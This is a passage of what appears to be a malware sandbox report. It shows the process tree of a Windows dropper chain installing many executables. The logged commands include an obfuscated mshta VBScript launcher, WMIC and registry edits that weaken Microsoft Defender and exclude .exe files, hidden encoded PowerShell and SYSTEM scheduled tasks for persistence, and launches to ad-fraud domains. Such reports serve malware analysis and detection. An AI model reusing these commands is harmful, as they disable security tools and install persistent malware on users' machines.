C:\Users\Admin\Documents\tNATf5VA0VqmcWrm_AvVSaYL.exe"C:\Users\Admin\Documents\tNATf5VA0VqmcWrm_AvVSaYL.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5372
-
-
C:\Users\Admin\Documents\06CkN7FO8xm9myg70xkI_mi_.exe"C:\Users\Admin\Documents\06CkN7FO8xm9myg70xkI_mi_.exe"2⤵
- Executes dropped EXE
PID:2496 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6844
-
-
-
C:\Users\Admin\Documents\9jBk858e4N6gbZUrGusO0pED.exe"C:\Users\Admin\Documents\9jBk858e4N6gbZUrGusO0pED.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4644 -
C:\Users\Admin\Documents\9jBk858e4N6gbZUrGusO0pED.exeC:\Users\Admin\Documents\9jBk858e4N6gbZUrGusO0pED.exe3⤵
- Executes dropped EXE
PID:3100
-
-
C:\Users\Admin\Documents\9jBk858e4N6gbZUrGusO0pED.exeC:\Users\Admin\Documents\9jBk858e4N6gbZUrGusO0pED.exe3⤵
- Executes dropped EXE
PID:5092
-
-
C:\Users\Admin\Documents\9jBk858e4N6gbZUrGusO0pED.exeC:\Users\Admin\Documents\9jBk858e4N6gbZUrGusO0pED.exe3⤵PID:4116
-
-
-
C:\Users\Admin\Documents\lCXMl152LhcK6yxYATpsFZXP.exe"C:\Users\Admin\Documents\lCXMl152LhcK6yxYATpsFZXP.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5832 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6520
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"3⤵PID:6512
-
C:\Users\Admin\Documents\rr4RD3RBL7HTmHEvcuU1pqzk.exe"C:\Users\Admin\Documents\rr4RD3RBL7HTmHEvcuU1pqzk.exe"4⤵
- Enumerates system info in registry
PID:2532
-
-
C:\Users\Admin\Documents\Ow5NRLCN4y2Jj8l8_WGIHeAJ.exe"C:\Users\Admin\Documents\Ow5NRLCN4y2Jj8l8_WGIHeAJ.exe"4⤵PID:6224
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\Ow5NRLCN4y2Jj8l8_WGIHeAJ.exe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\Ow5NRLCN4y2Jj8l8_WGIHeAJ.exe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )5⤵PID:6776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\Ow5NRLCN4y2Jj8l8_WGIHeAJ.exe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\Ow5NRLCN4y2Jj8l8_WGIHeAJ.exe" ) do taskkill -iM "%~nxq" /f6⤵PID:1616
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G7⤵PID:6764
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )8⤵PID:3276
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f9⤵PID:680
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs8⤵
- Loads dropped DLL
PID:5056
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Ow5NRLCN4y2Jj8l8_WGIHeAJ.exe" /f7⤵
- Kills process with taskkill
PID:1992
-
-
-
-
-
C:\Users\Admin\Documents\MD9fSmd0fymRgG5NnOS41kHX.exe"C:\Users\Admin\Documents\MD9fSmd0fymRgG5NnOS41kHX.exe"4⤵PID:5932
-
-
C:\Users\Admin\Documents\H65wf1hPhmg8Bn_9m7je_3hN.exe"C:\Users\Admin\Documents\H65wf1hPhmg8Bn_9m7je_3hN.exe"4⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\7zS3752.tmp\Install.exe.\Install.exe5⤵PID:4132
-
C:\Users\Admin\AppData\Local\Temp\7zS3BD6.tmp\Install.exe.\Install.exe /S /site_id "668658"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5780 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &7⤵PID:4492
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"8⤵PID:6388
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:3972
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:5680
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:6324
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:1608 -
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:2824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:5480
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:2044
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"8⤵PID:4780
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:6528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:4732
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:10168
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"8⤵PID:11976
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:12112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:12176
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:12696
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:2088
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
- Suspicious use of SetThreadContext
PID:1048 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:5288
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:6824
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:5552
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:1996
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:1596
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:5732
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbSdcwQOO" /SC once /ST 17:33:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:6072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEwGusBEGbIeKSSfjR" /SC once /ST 22:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\ILVkWWh.exe\" XY /site_id 668658 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:6284
-
-
-
-
-
C:\Users\Admin\Documents\SH69tG8YZpOgHw6i83GPVtVA.exe"C:\Users\Admin\Documents\SH69tG8YZpOgHw6i83GPVtVA.exe" /mixtwo4⤵PID:656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 2365⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5884
-
-
-
C:\Users\Admin\Documents\u_qDmvo8MLirpy7Ox_gCrdCH.exe"C:\Users\Admin\Documents\u_qDmvo8MLirpy7Ox_gCrdCH.exe"4⤵PID:4160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 2565⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5364
-
-
-
C:\Users\Admin\Documents\7UoCrh0kKkYGoQ3qB71EN8XU.exe"C:\Users\Admin\Documents\7UoCrh0kKkYGoQ3qB71EN8XU.exe"4⤵PID:5356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 3085⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3108
-
-
-
C:\Users\Admin\Documents\PyOkuX0qQjn1Wn7M7SGPFKZe.exe"C:\Users\Admin\Documents\PyOkuX0qQjn1Wn7M7SGPFKZe.exe"4⤵PID:1496
-
-
C:\Users\Admin\Documents\ezooW5ff_Ndm3Gn3oKh0pX1O.exe"C:\Users\Admin\Documents\ezooW5ff_Ndm3Gn3oKh0pX1O.exe"4⤵PID:5876
-
C:\Users\Admin\AppData\Local\Temp\is-H6J6H.tmp\ezooW5ff_Ndm3Gn3oKh0pX1O.tmp"C:\Users\Admin\AppData\Local\Temp\is-H6J6H.tmp\ezooW5ff_Ndm3Gn3oKh0pX1O.tmp" /SL5="$10400,506127,422400,C:\Users\Admin\Documents\ezooW5ff_Ndm3Gn3oKh0pX1O.exe"5⤵
- Loads dropped DLL
PID:2516 -
C:\Users\Admin\AppData\Local\Temp\is-I0FF5.tmp\Chmenka.exe"C:\Users\Admin\AppData\Local\Temp\is-I0FF5.tmp\Chmenka.exe" /S /UID=1246⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:840 -
C:\Program Files\Internet Explorer\VJLPAYVUCW\IDownload.exe"C:\Program Files\Internet Explorer\VJLPAYVUCW\IDownload.exe" /VERYSILENT7⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\is-NAO22.tmp\IDownload.tmp"C:\Users\Admin\AppData\Local\Temp\is-NAO22.tmp\IDownload.tmp" /SL5="$40340,994212,425984,C:\Program Files\Internet Explorer\VJLPAYVUCW\IDownload.exe" /VERYSILENT8⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5416 -
C:\Program Files (x86)\IDownload\IDownload.App.exe"C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu9⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2956 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lg6gty13.cmdline"10⤵PID:4056
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABB3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCABB2.tmp"11⤵PID:7124
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\74-cc1ed-c82-932b4-800ef52b66f92\Hipadesudo.exe"C:\Users\Admin\AppData\Local\Temp\74-cc1ed-c82-932b4-800ef52b66f92\Hipadesudo.exe"7⤵PID:4496
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵PID:9368
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447189⤵PID:9752
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵PID:14944
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447189⤵PID:15076
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵PID:16972
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447189⤵PID:17000
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵PID:2984
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447189⤵PID:6072
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵PID:7484
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447189⤵PID:7588
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵PID:8740
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447189⤵PID:5932
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵PID:10068
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447189⤵PID:1836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1e-047db-25d-784ae-4c86635375311\Toxalowupae.exe"C:\Users\Admin\AppData\Local\Temp\1e-047db-25d-784ae-4c86635375311\Toxalowupae.exe"7⤵PID:5692
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3rer5l11.pmm\GcleanerEU.exe /eufive & exit8⤵PID:14776
-
C:\Users\Admin\AppData\Local\Temp\3rer5l11.pmm\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\3rer5l11.pmm\GcleanerEU.exe /eufive9⤵
- Executes dropped EXE
PID:4104 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 30010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7524
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqjs2soo.xz3\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:17180
-
C:\Users\Admin\AppData\Local\Temp\xqjs2soo.xz3\installer.exeC:\Users\Admin\AppData\Local\Temp\xqjs2soo.xz3\installer.exe /qn CAMPAIGN="654"9⤵PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4a3zvxu.qmu\anyname.exe & exit8⤵PID:6544
-
C:\Users\Admin\AppData\Local\Temp\g4a3zvxu.qmu\anyname.exeC:\Users\Admin\AppData\Local\Temp\g4a3zvxu.qmu\anyname.exe9⤵PID:6956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pm3coswp.ytx\gcleaner.exe /mixfive & exit8⤵PID:6564
-
C:\Users\Admin\AppData\Local\Temp\pm3coswp.ytx\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pm3coswp.ytx\gcleaner.exe /mixfive9⤵PID:8912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8912 -s 30810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10920
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6536
-
-
-
C:\Users\Admin\Documents\qhYrJB9kry0268opnWewH4YH.exe"C:\Users\Admin\Documents\qhYrJB9kry0268opnWewH4YH.exe"2⤵PID:2632
-
C:\Users\Admin\AppData\Roaming\6185947.scr"C:\Users\Admin\AppData\Roaming\6185947.scr" /S3⤵
- Executes dropped EXE
PID:5976 -
